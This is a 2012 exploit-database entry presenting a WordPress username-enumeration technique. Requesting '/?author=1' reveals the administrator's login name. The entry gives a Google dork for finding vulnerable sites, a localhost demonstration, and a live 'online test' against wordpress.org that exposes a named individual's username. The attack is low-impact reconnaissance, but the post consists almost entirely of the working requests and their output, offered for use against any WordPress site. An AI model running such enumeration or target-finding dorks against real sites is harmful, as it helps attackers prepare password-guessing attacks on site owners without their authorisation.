WordPress Author Name Disclosure

2012-09-18T00:00:00
ID PACKETSTORM:116663
Type packetstorm
Reporter PistqoN
Modified 2012-09-18T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress All Version Wp-Admin Username Vulnerability  
# Google Dork: inurl:/?author=1  
# Date: 17/09/12  
# Exploit Author: PistqoN  
# E-Mail: Pistqon@hotmail.com  
# Software Link: http://wordpress.org/download/  
# Version: All  
# Tested on: Linux Ubuntu - Windows 7 - Windows Xp  
# Video: https://vimeo.com/49694640  
  
# Exploit work on  
  
[+] http://localhost/wordpress/?author=1  
[+] Title: Wordpress - admin > http://localhost/wordpress/wp-login.php > Username (admin)  
  
# Online Test  
  
[+] http://www.wordpress.org/?author=1  
[+] Title: Wordpress - Matt Mullenweg > http://www.wordpress.org/wp-login.php > Username (Matt Mullenweg)  
`